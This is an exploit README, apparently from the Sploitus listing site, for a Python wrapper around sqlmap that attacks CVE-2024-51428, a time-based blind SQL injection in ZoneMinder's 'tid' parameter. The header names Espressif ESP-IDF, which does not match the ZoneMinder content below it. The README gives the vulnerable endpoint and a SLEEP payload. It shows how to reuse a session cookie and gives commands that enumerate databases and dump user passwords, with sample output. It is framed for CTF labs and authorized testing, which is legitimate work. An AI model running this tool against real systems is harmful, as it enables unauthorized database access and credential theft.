Exploit for Allocation of Resources Without Limits or Throttling in Espressif Esp-Idf CVE-2024-51428

## https://sploitus.com/exploit?id=B0CE62B6-6B59-5808-9FB0-3B603895DEA0
# CVE-2024-51428 - ZoneMinder Blind SQL Injection PoC

Python wrapper for **sqlmap** designed to exploit **CVE-2024-51428** in ZoneMinder.  
This tool automates detection and exploitation of a **Blind SQL Injection** vulnerability while keeping the output clean and focused on useful data.

The script hides sqlmap logs and only displays relevant information such as:

- Detected injection point
- Database names
- Tables
- Dumped credentials or sensitive data

This makes the tool ideal for **CTF environments, demonstrations, and security testing**.

---

## Vulnerability Overview

**CVE:** CVE-2024-51428  
**Type:** Blind SQL Injection  
**Affected Software:** ZoneMinder  
**Attack Vector:** HTTP GET parameter  
**Parameter:** `tid`

The vulnerability exists in the following endpoint:

```
/zm/index.php?view=request&request=event&action=removetag&tid=
```

The `tid` parameter is not properly sanitized before being used in a database query, allowing attackers to inject SQL queries.

The exploitation technique used is **time-based blind SQL injection**.

Example payload discovered by sqlmap:

```sql
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)
```

This payload forces the database to sleep if the query is executed successfully, confirming the presence of SQL injection.

---

## Features

- Automatic **Blind SQL Injection detection**
- Database enumeration
- Table enumeration
- Table dumping
- Column filtering
- Row filtering
- Clean output (sqlmap logs hidden)
- Designed for **CTF and pentesting labs**

---

## Requirements

- Python 3
- sqlmap

Install sqlmap if needed:

```bash
sudo apt install sqlmap
```

---

## Usage

Basic syntax:

```bash
python3 poc.py --url  -c ''
```
> With this command we check if it is vulnerable or not

Example:

```bash
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'
```

---

## Getting the Required Cookie

The exploit requires a valid ZoneMinder session cookie.

Steps:

1. Open the target in your browser
2. Open Developer Tools
3. Navigate to:

```
Application → Cookies
```

4. Locate the cookie named:

```
ZMSESSID
```

5. Copy its value and use it with `-c`

Example:

```bash
-c '151fvdqmjkhnkfat7l5epgmd22'
```

---

## Checking if the Target is Vulnerable

```bash
python3 poc.py --url http://target.htb -c 'COOKIE'
```

Example output:

```
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION
```

---

## Enumerating Databases

```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d
```

Example output:

```
available databases [3]:
information_schema
mysql
zm
```

---

## Enumerating Tables

```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm
```

Example output:

```
Database: zm

Users
Events
Monitors
Storage
```

---

## Dumping a Table

```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users
```

---

## Dumping a Specific Column

```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username
```

Example:

```
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+
```

---

## Filtering Rows (WHERE clause)

You can filter rows using:

```bash
-ff  
```

Example:

```bash
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark
```

Equivalent SQL:

```sql
WHERE Username='mark'
```

---

## Dumping Password for a Specific User

Example:

```bash
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark
```

Internal sqlmap command:

```bash
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump
```

---

## How the Tool Works

The script acts as a wrapper around sqlmap.

Steps performed internally:

1. Build the vulnerable endpoint

```
/zm/index.php?view=request&request=event&action=removetag&tid=1
```

2. Pass the authentication cookie to sqlmap
3. Execute sqlmap with optimized options:

```
--threads=10
--technique=T
--batch
```

4. Parse sqlmap output in real time
5. Filter out logs and display only:

  - injection information
  - databases
  - tables
  - dumped data

---

## Intended Use

This tool was created for:

- Capture The Flag challenges
- Security research
- Educational purposes
- Pentesting labs

---

## Disclaimer

This project is provided for educational and authorized security testing purposes only.

The author is not responsible for any misuse of this tool.

Always obtain proper authorization before testing any system.

---

## Author

Security Research / CTF tooling